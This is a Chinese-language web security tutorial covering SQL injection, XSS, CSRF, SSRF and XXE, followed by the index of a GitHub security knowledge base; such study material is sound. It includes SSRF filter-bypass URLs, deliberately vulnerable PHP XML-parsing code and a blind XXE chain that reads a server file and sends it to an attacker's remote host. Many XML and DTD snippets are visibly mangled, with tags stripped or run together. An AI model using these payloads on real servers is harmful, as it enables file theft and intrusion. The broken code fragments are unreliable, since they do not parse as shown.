一次Web访问过程分析:DNS域名解析、TCP连接、HTTP请求、处理请求返回HTTP响应、页面渲染和关闭连接。
SQL注入漏洞是指,
攻击者能够利用现有Web应用程序,将恶意的数据插入SQL查询中,提交到后台数据库引擎执行非授权操作。
SQL注入攻击利用的工具是SQL语法。
1、非法查询、修改或删除数据库资源。
2、执行系统命令。
3、获取承载主机操作系统和网络的访问权限。
1、注入点选择
2、数字型和字符型注入
3、通过Web端对数据库注入或者直接访问数据库注入
1、报错注⼊
2、bool 型注⼊
3、延时注⼊
4、宽字节注⼊
1、使⽤安全的 API
2、对输⼊的特殊字符进⾏ Escape 转义处理
3、使⽤⽩名单来规范化输⼊验证⽅法
4、对客户端输⼊进⾏控制,不允许输⼊ SQL 注⼊相关的特殊字符
5、服务器端在提交数据库进⾏ SQL 查询之前,对特殊字符进⾏过滤、转义、替换、删除。
6、规范编码, 字符集
跨站脚本(Cross Site Script),简称XSS。
XSS漏洞是指:应用程序没有对接收到的不可信数据经过适当的验证或转义就直接发给客户端浏览器。
原理:web浏览器可以执行HTML页面中嵌入的脚本命令,攻击者利用XSS漏洞将恶意脚本代码注入到网页中,当用户浏览该网页时,便会触发执行恶意脚本。
XSS漏洞主要危害
1 非法访问、篡改敏感数据
2 会话劫持
3 控制受害机器向其他站点发起攻击
1)最普遍的一种类型。
2)服务器直接使用客户端提供的数据而没有对数据进行无害化处理,就会出现此漏洞。
3)特点:用户单击时触发,而且只执行一次,因此反射型XSS也称为非持久型XSS。
反射型XSS通常是由
攻击者诱使用户向有漏洞的Web应用程序提供危险内容,然后危险内容会反射给用户并由浏览器执行。
XSS漏洞潜在影响的一种攻击:可导致攻击者截获一名通过验证的用户的会话。
劫持用户的会话后,攻击者就可以访问该用户经授权访问的所有数据和功能。
实施这种攻击的步骤如图:
存储型XSS也称为持久型XSS,它的危害更大。此类XSS 不需要用户单击特定的URL 就能执行跨站脚本。攻击者事先将恶意脚本代码上传或者存储到存在漏洞的服务器端数据库中,只要用户浏览包含此恶意脚本的网页便会触发,遭受攻击。
存储型XSS漏洞通常在留言板、个人资料、博客日志等位置出现,并常被用于编写危害性更大的XSS蠕虫。
基于DOM的XSS又称为本地XSS,DOM 型 XSS 漏洞是基于文档对象模型 (Document Objeet Model,DOM)的⼀种漏洞。
由于客户端浏览器JavaScript可以访问浏览器的DOM动态地检查和修改页面的内容,当HTML页面采用不安全的方式从document.location、document.URL、document.referrer或其他攻击者可以修改的对象获取数据时,如果数据包含恶意JavaScript脚本,就会触发基于DOM的XSS攻击。
基于DOM的XSS攻击与反射型XSS和存储型XSS不同,基于DOM的XSS攻击来源于客户端处理的脚本中,无需服务器端的参与。
文档对象模型 (DOM) 将 web 页面与到脚本或编程语言连接起来。通常是指 JavaScript,但将 HTML、SVG 或 XML 文档建模为对象并不是 JavaScript 语言的一部分。DOM模型用一个逻辑树来表示一个文档,树的每个分支的终点都是一个节点(node),每个节点都包含着对象(objects)。DOM的方法(methods)让你可以用特定方式操作这个树,用这些方法你可以改变文档的结构、样式或者内容。节点可以关联上事件处理器,一旦某一事件被触发了,那些事件处理器就会被执行。
如果安全应急响应中心(SRC,Security Response Center) 上报了⼀个 XSS 漏洞,payload 已经写⼊页面,但未给出具体位置,如何快速介⼊?
看是什么类型的 XSS,XSS 反射型看提交的地址,指的参数是哪个位置,通过这个⻚⾯进⾏ fuzzing 测试。如果是存储型⻚⾯查找关键字。
修复方式:对字符实体进⾏转义、使⽤ HTTP Only 来禁⽌ JavaScript 读取 Cookie 值、输⼊时校验、浏览器与 Web 应⽤端采⽤相同的字符编码。
人工测试思路:找到类似 document.write、innerHTML 赋值、outterHTML 赋值、window.location 操作、写 javascript: 后内容、eval、setTimeout 、setInterval 等直接执⾏之类的函数点。找到其变量,回溯变量来源观察是否可控,是否经过安全函数。
自动化测试参看道哥的博客,思路是从输入入手,观察变量传递的过程,最终检查是否有在危险函数输出,中途是否有经过安全函数。但是这样就需要有⼀个 javascript 解析器,否则会漏掉⼀些通过 js 执⾏带⼊的部分内容容。
从0到1完全掌握 CSRF
跨站请求伪造(Cross-site request forgery)简称CSRF,尽管与跨站脚本漏洞名称相近,但它与跨站脚本漏洞不同。
XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。
CSRF和反射型XSS的主要区别是:反射型XSS的目的是在客户端执行脚本,CSRF的目的是在Web应用中执行操作。
CSRF跨站请求伪造攻击迫使登录用户的浏览器将伪造的HTTP请求,包括该用户的会话Cookie和其他认证信息,发送到一个存在漏洞的Web应用程序,而这些请求会被应用程序认为是用户的合法请求。
篡改⽬标⽹站上的⽤户数据、盗取⽤户隐私数据、传播 CSRF 蠕虫。
CSRF 防御原理:不让黑客那么容易伪造请求
1、cookie 中加⼊随机数,要求请求中带上,⽽攻击者获取不到 cookie中的随机数。
2、验证HTTP Referer 字段, 在请求地址中添加 takon 验证。
token 和 referer 做横向对比,谁安全等级高?
token 安全等级更⾼,因为并不是任何服务器都可以取得 referer,如果从 HTTPS 跳到 HTTP,也不会发送 referer。并且 FLASH ⼀些版本中可以⾃定义 referer。但是 token 的话,要保证其⾜够随机且不可泄露。(不可预测性原则)
对 referer 的验证,从什么⻆度去做?
对 header 中的 referer 的验证,⼀个是空 referer,⼀个是 referer 过滤或者检测不完善。为了杜绝这种问题,在验证的白名单中,正则规则应当写完善。
针对 token,会对 token的哪方面进⾏测试?
针对token的攻击,⼀是对它本身的攻击,重放测试⼀次性、分析加密规则、校验⽅式是否正确等,⼆是结合信息泄露漏洞对它的获取,结合着发起组合攻击信息泄露有可能是缓存、⽇志、get,也有可能是利⽤跨站很多跳转登录的都依赖token,有⼀个跳转漏洞加反射型跨站就可以组合成登录劫持了。另外也可以结合着其它业务来描述token的安全性及设计不好怎么被绕过⽐如抢红包业务之类的。
SSRF(Server-Side Request Forgery,服务器端请求伪造)。是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。
一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。
很多Web应用都提供了从其他服务器上获取数据的功能。使用用户指定的URL,Web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地服务器。
可以对外网服务器所在的内网、本地进行端口扫描,获取一些服务的banner信息 。
攻击运行在内网或者本地的应用程序。
对内网web应用进行指纹识别,通过访问默认文件实现 。
攻击内外网的web应用。sql注入、struct2、redis等。
利用file协议读取本地文件等。
1、可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);
2、攻击运行在内网或本地的有漏洞程序(比如溢出);
3、可以对内网Web应用进行指纹识别,原理是通过请求默认的文件得到特定的指纹
4、攻击内网或外网有漏洞的Web应用
5、使用file:///协议读取本地文件
一. WEB功能上查找
1、分享:通过URL地址分享网页内容
通过URL地址分享网页内容早期应用中 ,为了更好的用户体验,Web应用在分享功能中,通常会获取目标URL地址网页内容中标签或者标签中content的文本内容提供更好的用户体验。
2、转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览
3、在线翻译:通过 URL地址翻译对应文本的内容
4、图片加载与下载:通过URL地址加载或下载图片
图片加载远程图片地址此功能用到的地方很多,但大多都是比较隐秘,如有些公司中的加载自家图片服务器上的图片用于展示。(开发者为了有更好的用户体验通常对图片做些微小调整例如加水印、压缩等,就必须要把图片下载到服务器的本地,所以就可能造成SSRF问题)。
5、图片、文章收藏功能
6、未公开的api实现以及其他调用URL的功能
7、从URL关键字中寻找
二. 从URL关键字中寻找
Share、wap、url、link、src、source、target、u、3g、display、sourceURL、imageURL、domain
三. 通用的SSRF实例
Weblogic配置不当,天生ssrf漏洞
Discuz x2.5/x3.0/x3.1/x3.2 ssrf漏洞
1、过滤返回信息,验证远程服务器对请求的响应是比较容易的方法。如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。
2、统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态。
3、限制请求的端口为http常用的端口,比如,80,443,8080,8090。
4、黑名单内网ip。避免应用被用来获取获取内网数据,攻击内网。
5、禁用不需要的协议。仅仅允许http和https请求。可以防止类似于file:///,gopher://,ftp:// 等引起的问题。
1、@
http://[email protected]
2、添加端口号
http://127.0.0.1:8080
3、短地址
http://dwz.cn/11SMa
4、可以指向任意ip的域名:xip.io
5、ip地址转换成进制来访问
115.239.210.26 = 16373751032
XXE 漏洞详解
XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。外部实体对于在文档中创建动态引用非常有用,这样对引用资源所做的任何更改都会在文档中自动更新。但是,在处理外部实体时,可以针对应用程序启动许多攻击。这些攻击包括泄露本地系统文件,这些文件可能包含密码和私人用户数据等敏感数据,或利用各种方案的网络访问功能来操纵内部应用程序。通过将这些攻击与其他实现缺陷相结合,这些攻击的范围可以扩展到客户端内存损坏,任意代码执行,甚至服务中断,具体取决于这些攻击的上下文。
XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 文档类型定义(DTD,Document Type Definition) 的东西控制的。
//这一行是 XML 文档定义
<!DOCTYPE message [
message (receiver ,sender ,header ,msg)>
<!ELEMENT receiver (#PCDATA)>
<!ELEMENT sender (#PCDATA)>
<!ELEMENT header (#PCDATA)>
<!ELEMENT msg (#PCDATA)>
上面这个 DTD 就定义了 XML 的根元素是 message,然后跟元素下面有一些子元素,那么 XML 到时候必须像下面这么写
<message>
<receiver>Myselfreceiver>
<sender>Someonesender>
<header>TheReminderheader>
<msg>This is an amazing bookmsg>
message>
其实除了在 DTD 中定义元素(其实就是对应 XML 中的标签)以外,我们还能在 DTD 中定义实体(对应XML 标签中的内容),毕竟 XML 中除了能标签以外,还需要有些内容是固定的
DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "test" >]>
这里 定义元素为 ANY 说明接受任何元素,但是定义了一个 xml 的实体(实体其实可以看成一个变量,到时候我们可以在 XML 中通过 & 符号进行引用),那么 XML 就可以写成这样
示例代码:
<creds>
<user>&xxe;user>
<pass>mypasspass>
creds>
我们使用 &xxe 对 上面定义的 xxe 实体进行了引用,到时候输出的时候 &xxe 就会被 “test” 替换。
示例代码:
DOCTYPE foo [
<!ELEMENT foo ANY >
]>
<creds>
<user>&xxe;user>
<pass>mypasspass>
creds>
当然,还有一种引用方式是使用 引用公用 DTD 的方法,语法如下:
DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”>
我们上面已经将实体分成了两个派别(内部实体和外部外部),但是实际上从另一个角度看,实体也可以分成两个派别(通用实体和参数实体)。
用 &实体名;
在DTD 中定义,在 XML 文档中引用
DOCTYPE updateProfile [ ]>
<updateProfile>
<firstname>Joefirstname>
<lastname>&file;lastname>
...
updateProfile>
(1)使用 % 实体名
(这里面空格不能少) 在 DTD 中定义,并且只能在 DTD 中使用 %实体名;
引用(2)只有在 DTD 文件中,参数实体的声明才能引用其他实体 (3)和通用实体一样,参数实体也可以外部引用
示例代码:
<!ENTITY % an-element " mytag (subtag)>">
%an-element; %remote-dtd;
抛转:参数实体在我们 Blind XXE 中起到了至关重要的作用
这个实验的攻击场景模拟的是在服务能接收并解析 XML 格式的输入并且有回显的时候,我们就能输入我们自定义的 XML 代码,通过引用外部实体的方法,引用服务器上面的文件。
本地服务器上放上解析 XML 的 php 代码:
xml.php
libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
echo $creds;
?>
其中:LIBXML_NOENT: 将 XML 中的实体引用 替换 成对应的值 LIBXML_DTDLOAD: 加载 DOCTYPE 中的 DTD 文件
触发XXE
DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "Hello world!" >]>
DOCTYPE creds [
]>
<creds>&goodies;creds>
引用外部实体读取文件
引用方式是使用 引用公用 DTD 的方法读取
有回显的情况可以直接在页面中看到Payload的执行结果或现象,无回显的情况又称为blind xxe
,可以使用外带数据通道提取数据,先使用php://filter获取目标文件的内容,然后将内容以http请求发送到接受数据的服务器。
xml.php
libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
?>
test.dtd
% send SYSTEM 'http://xxx?p=file;'>">
payload
DOCTYPE convert [
%remote;%int;%send;
]>
我们从 payload 中能看到 连续调用了三个参数实体 %remote;%int;%send;
,这就是我们的利用顺序,%remote
先调用,调用后请求远程服务器上的 test.dtd ,有点类似于将 test.dtd 包含进来,然后 %int
调用 test.dtd 中的 %file, %file 就会去获取服务器上面的敏感文件,然后将 %file
的结果填入到 %send
以后(因为实体的值中不能有 %, 所以将其转成html实体编码 %),我们再调用 %send
; 把我们的读取到的数据发送到我们的远程 vps 上,这样就实现了外带数据的效果,完美的解决了 XXE 无回显的问题。
实战靶场
复制链接到电脑端操作:
https://www.hetianlab.com/expc.do?ec=ECID9117-d620-481d-91f8-344e0ac69dea&pk_campaign=weixin-wemedia#stu
GitHub上的安全知识框架:
项目文件一览
Security
安全工具 - 各类安全工具的使用介绍
安全资源
靶机
HTB
VulnHub
DC Serial - DC 系列靶场,难度简单至中等,可以学习各种提权和CMS漏洞利用,推荐初学者挑战
It’s_October
Kioptrix Serial - Kioptrix 系列靶场,难度简单至中等,推荐初学者挑战
Mission-Pumpkin - 难度适中,偏向于加解密比较多,漏洞利用内容较少
symfonos Serial - 挺有难度的靶场,内容丰富,难度中等,漏洞利用内容很多,推荐有一定经验者挑战
Wargames
Bandit
BlueTeam
分析 - 分析工具与分析案例
加固 - 系统、应用加固的方法和工具资源
监察 - 有关查杀、监控、蜜罐的资源
取证 - 内容涉及操作系统的取证、web 的取证、文件的取证
应急 - 应急资源、溯源案例
笔记 - 涉及磁盘取证、内存取证、USB取证等内容
实验 - 涉及流量分析实战、安防设施搭建等内容
Crypto
Crypto - 介绍各种编码和加密算法及相关的工具
CTF
CTF - 收集 CTF 相关的工具和 writeup 资源
writeup - 自己参与的一些比赛记录
ICS
工控协议 - 总结各类工控协议的知识点
上位机安全 - 总结上位机安全相关的知识点
PLC攻击 - 总结 PLC 攻击的相关知识点
S7comm相关 - 记录 S7comm 相关错误类型、功能码和相关参数
实验 - 仿真环境搭建和 PLC 攻击实验
IOT
固件安全
固件安全 - 记录 IOT 固件分析的知识点,包括固件提取、固件分析、固件解密等
实验 - 分析固件实验
无线电安全
实验 - 无线电安全实验
硬件安全
Device-Exploits - 嵌入式设备相关漏洞利用,不太熟悉这一块,内容不多
HID - 和组员制作的 HID 实物记录
MobileSec
Android安全 - 记录一些安卓安全相关的内容,这块掌握较少
RedTeam
安防设备
Bypass技巧 - 记录 waf 绕过手段
SecDevice-Exploits - 常见的安全设备的漏洞利用方法
后渗透
后渗透 - 后渗透知识点的大纲
权限提升 - 操作系统和数据库的提权方法
权限维持 - 权限维持的各种方法和资源
实验
软件服务安全
CS-Exploits - 收集软件、业务应用服务漏洞的渗透手段和 cve 漏洞
DesktopApps-Exploits - 收集桌面软件的渗透手段和 cve 漏洞
协议安全
Protocol-Exploits - 按照协议归类各种漏洞、攻击手段
笔记
信息收集
端口安全 - 记录端口渗透时的方法和思路
空间测绘 - 收集搜索引擎语法资源
信息收集 - 记录信息收集方面各类技术,如漏扫、IP 扫描、端口扫描、DNS 枚举、目录枚举、指纹等
语言安全
语言安全
云安全
云安全 - 云主机利用工具,渗透案例,相关知识点
OS安全
Linux安全 - 包含 Linux 口令破解,漏洞利用、获取Shell
OS-Exploits - 收集操作系统的 cve 漏洞
Windows安全 - 包含 windows pth、ptt,漏洞利用、提权、远程执行命令
实验
Web 安全
前端攻防 - 前端解密,绕过访问
BS-Exploits - 全面收集 web 漏洞 POC | Payload | exp
IDOR - 整个部分结构大部分基于乌云的几篇密码找回、逻辑漏洞类文章,在其基础上记录和归纳
靶场
Web_Generic
Web_Tricks
Reverse
Reverse
实验
FILE
Develop
版本控制
Git学习笔记 - 记录 git 的用法和平时使用 github 遇到的问题
标记语言
HTML
JSON
XML
可视化
gnuplot
正则
regex - 常用正则表达式和相关资源
Web
Speed-Web
HTTP
笔记
Integrated
数据库
Power-SQL
Speed-SQL
笔记
实验
虚拟化
Docker
Linux
God-Linux - 记录 Linux 下的骚操作,收集的较少,后面会慢慢添加
Power-Linux - 配置指南,记录各种服务搭建与配置过程
Secure-Linux - Linux 加固+维护+应急响应参考
Speed-Linux - 命令速查手册,记录各种基本命令操作
笔记
实验 - 各种 linux 服务的搭建过程和案例
Network
不同厂商 - 记录不同厂商配置服务命令的区别
方向实验 - 按方向分类记录配置
速查 - 速查各类帧、报文格式、掩码等
SDN笔记 - 记录以前比赛时 SDN 的题目和命令
TCP-IP - 记录 TCP/IP 协议栈的协议
VPN-Security - 记录 VPN 领域的协议
Windows
Secure-Win - Windows 加固+维护+应急响应参考
Speed-Win - 记录 windows 下 CMD 常用命令
笔记
实验 -涉及域环境搭建、基础服务搭建
Powershell
Plan
Misc-Plan - 各种小技巧
Team-Plan - 团队协作解决方案
Thinking-Plan - 问题解决方式的记录和学习
VM-Plan - VMWare 常见问题记录